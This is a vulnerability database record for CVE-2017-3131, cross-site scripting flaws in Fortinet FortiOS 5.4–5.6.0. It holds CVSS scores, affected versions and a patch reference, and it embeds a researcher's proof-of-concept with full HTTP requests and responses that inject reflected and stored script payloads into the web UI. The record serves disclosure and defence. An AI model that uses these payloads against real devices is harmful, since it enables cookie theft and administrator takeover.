ID

VAR-201709-0475


CVE

CVE-2017-3131


TITLE

Fortinet FortiOS Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2017-007923

DESCRIPTION

A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.4.0 through 5.4.4 and 5.6.0 allows attackers to execute unauthorized code or commands via the filter input in "Applications" under FortiView.

Fortinet FortiOS contains a cross-site scripting vulnerability. Information may be obtained and information may be altered.

FortiOS is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam.

# Title: FortiOS <= 5.6.0 Multiple XSS Vulnerabilities
# Vendor: Fortinet (www.fortinet.com)
# CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133
# Date: 28.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)

Affected FortiNet products:
* CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0
* CVE-2017-3132 : FortiOS versions up to 5.6.0
* CVE-2017-3133 : FortiOS versions up to 5.6.0

Fix:
Upgrade to FortiOS version 5.6.1

Video PoC (add admin):
https://youtu.be/fcpLStCD61Q

Vendor advisory:
https://fortiguard.com/psirt/FG-IR-17-104

Vulns:

1. XSS in WEB UI - Applications:

URL:
https://192.168.1.99/ng/fortiview/app/15832" onmouseover=alert('XSS') x="y

Http request:
GET /ng/fortiview/app/15832%22%20onmouseover=alert('XSS')%20x=%22y HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A"; ccsrftoken_573485771="5424C6B3842788A23E3413307F1DFFC5"; ccsrftoken="5424C6B3842788A23E3413307F1DFFC5"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 12:07:47 GMT
Server: xxxxxxxx-xxxxx
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Vary: Accept-Encoding
Content-Length: 6150
Connection: close
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-UA-Compatible: IE=Edge

(...)
<span class="fgd-app tooltip id_15832" onmouseover="alert('XSS')" x="y " data-address="undefined" data-dport="443" data-protocol="6"><a href="https://www.fortiguard.com/fos/15832" onclick="return false;" data-hasqtip="2"><span class="app_icon app15832" onmouseover="alert('XSS')" x="y"></span><label class="app_label" title="">15832" onmouseover=alert('XSS') x="y</label></a></span>
(...)

2. XSS in WEB UI - Assign Token:

URL:
https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cscript%3E

Http request:
GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A"; ccsrftoken_573485771="314A25687F6B2075F9413405575D477"; ccsrftoken="314A25687F6B2075F9413405575D477"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 13:39:17 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
Expires: Thu, 23 Mar 2017 13:39:17 GMT
Vary: Cookie,Accept-Encoding
Last-Modified: Thu, 23 Mar 2017 13:39:17 GMT
X-UA-Compatible: IE=Edge
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
Set-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3485

(...)
<script type="text/javascript">
var ftokens = [];
var action = '</script><script>alert('XSS')</script><script>';
</script>
</head>
(...)

3. Stored XSS in WEB UI - Replacement Messages:

#1 - Http request:
POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff
X-Requested-With: XMLHttpRequest
Content-Length: 125
Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D
DNT: 1
Connection: close

csrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%0A

#1 - Http response:
HTTP/1.1 302 FOUND
Date: Thu, 23 Mar 2017 15:36:33 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
Expires: Thu, 23 Mar 2017 15:36:33 GMT
Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
X-UA-Compatible: IE=Edge
Set-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/
Location: https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 0

#2 - Http request:
GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff
X-Requested-With: XMLHttpRequest
Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D
DNT: 1
Connection: close

#2 - Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 15:36:33 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
Expires: Thu, 23 Mar 2017 15:36:33 GMT
Vary: Cookie,Accept-Encoding
Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT
X-UA-Compatible: IE=Edge
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
Set-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 70940

(...)
<form id="replacemsg_form">
<div style='display:none'><input type='hidden' name='csrfmiddlewaretoken' value='d58f666c794024295cece8c5b8b6a3ff' /></div>
<textarea id="buffer" name="buffer">ABC</textarea>
<script>alert('XSS')</script>
</textarea>
(...)

Trust: 2.07

sources: NVD: CVE-2017-3131 // JVNDB: JVNDB-2017-007923 // BID: 100009 // VULHUB: VHN-111334 // PACKETSTORM: 143543

AFFECTED PRODUCTS

vendor: fortinet, model: fortios, scope: eq, version: 5.6.0

Trust: 2.4

vendor: fortinet, model: fortios, scope: eq, version: 5.4.4

Trust: 1.9

vendor: fortinet, model: fortios, scope: eq, version: 5.4.3

Trust: 1.9

vendor: fortinet, model: fortios, scope: eq, version: 5.4.2

Trust: 1.9

vendor: fortinet, model: fortios, scope: eq, version: 5.4.1

Trust: 1.9

vendor: fortinet, model: fortios, scope: eq, version: 5.4.0

Trust: 1.9

vendor: fortinet, model: fortios, scope: eq, version: 5.4.0 to 5.4.4

Trust: 0.8

vendor: fortinet, model: fortios, scope: eq, version: 5.6

Trust: 0.3

vendor: fortinet, model: fortios, scope: eq, version: 5.4.5

Trust: 0.3

vendor: fortinet, model: fortios, scope: eq, version: 5.2.0

Trust: 0.3

vendor: fortinet, model: fortios, scope: ne, version: 5.6.1

Trust: 0.3

sources: BID: 100009 // JVNDB: JVNDB-2017-007923 // CNNVD: CNNVD-201707-1511 // NVD: CVE-2017-3131

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-3131
value: MEDIUM

Trust: 1.0

NVD: CVE-2017-3131
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201707-1511
value: LOW

Trust: 0.6

VULHUB: VHN-111334
value: LOW

Trust: 0.1

nvd@nist.gov: CVE-2017-3131
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-111334
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2017-3131
baseSeverity: MEDIUM
baseScore: 5.4
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.3
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-111334 // JVNDB: JVNDB-2017-007923 // CNNVD: CNNVD-201707-1511 // NVD: CVE-2017-3131

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-111334 // JVNDB: JVNDB-2017-007923 // NVD: CVE-2017-3131

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201707-1511

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 143543 // CNNVD: CNNVD-201707-1511

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-007923

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-111334

PATCH

title: FG-IR-17-104, url: http://fortiguard.com/psirt/FG-IR-17-104

Trust: 0.8

title: Fortinet FortiOS Fixes for cross-site scripting vulnerabilities, url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=72204

Trust: 0.6

sources: JVNDB: JVNDB-2017-007923 // CNNVD: CNNVD-201707-1511

EXTERNAL IDS

db: NVD, id: CVE-2017-3131

Trust: 2.9

db: BID, id: 100009

Trust: 2.0

db: SECTRACK, id: 1039020

Trust: 1.1

db: EXPLOIT-DB, id: 42388

Trust: 1.1

db: JVNDB, id: JVNDB-2017-007923

Trust: 0.8

db: CNNVD, id: CNNVD-201707-1511

Trust: 0.7

db: PACKETSTORM, id: 143543

Trust: 0.2

db: VULHUB, id: VHN-111334

Trust: 0.1

sources: VULHUB: VHN-111334 // BID: 100009 // JVNDB: JVNDB-2017-007923 // PACKETSTORM: 143543 // CNNVD: CNNVD-201707-1511 // NVD: CVE-2017-3131

REFERENCES

url:http://www.securityfocus.com/bid/100009

Trust: 1.7

url:https://fortiguard.com/advisory/fg-ir-17-104

Trust: 1.7

url:https://www.exploit-db.com/exploits/42388/

Trust: 1.1

url:http://www.securitytracker.com/id/1039020

Trust: 1.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-3131

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-3131

Trust: 0.8

url:http://fortiguard.com/psirt/fg-ir-17-104

Trust: 0.4

url:http://www.fortinet.com/

Trust: 0.3

url:https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3c/script%3e%3cscript%3ealert('xss')%3c/script%3e%3cscript%3e

Trust: 0.1

url:https://www.fortinet.com)

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-3133

Trust: 0.1

url:https://www.fortiguard.com/fos/15832"

Trust: 0.1

url:https://192.168.1.99/p/system/replacemsg-group/edit/none/sslvpn/sslvpn-login/

Trust: 0.1

url:https://youtu.be/fcplstcd61q

Trust: 0.1

url:https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-3132

Trust: 0.1

url:https://192.168.1.99/ng/fortiview/app/15832"

Trust: 0.1

sources: VULHUB: VHN-111334 // BID: 100009 // JVNDB: JVNDB-2017-007923 // PACKETSTORM: 143543 // CNNVD: CNNVD-201707-1511 // NVD: CVE-2017-3131

CREDITS

Patryk Bogdan of Secorda.

Trust: 0.9

sources: BID: 100009 // CNNVD: CNNVD-201707-1511

SOURCES

db: VULHUB, id: VHN-111334
db: BID, id: 100009
db: JVNDB, id: JVNDB-2017-007923
db: PACKETSTORM, id: 143543
db: CNNVD, id: CNNVD-201707-1511
db: NVD, id: CVE-2017-3131

LAST UPDATE DATE

2024-11-23T22:07:16.156000+00:00


SOURCES UPDATE DATE

db: VULHUB, id: VHN-111334, date: 2017-09-15T00:00:00
db: BID, id: 100009, date: 2017-07-28T00:00:00
db: JVNDB, id: JVNDB-2017-007923, date: 2017-10-04T00:00:00
db: CNNVD, id: CNNVD-201707-1511, date: 2017-09-13T00:00:00
db: NVD, id: CVE-2017-3131, date: 2024-11-21T03:24:53.780

SOURCES RELEASE DATE

db: VULHUB, id: VHN-111334, date: 2017-09-12T00:00:00
db: BID, id: 100009, date: 2017-07-28T00:00:00
db: JVNDB, id: JVNDB-2017-007923, date: 2017-10-04T00:00:00
db: PACKETSTORM, id: 143543, date: 2017-07-28T19:22:22
db: CNNVD, id: CNNVD-201707-1511, date: 2017-07-31T00:00:00
db: NVD, id: CVE-2017-3131, date: 2017-09-12T02:29:00.203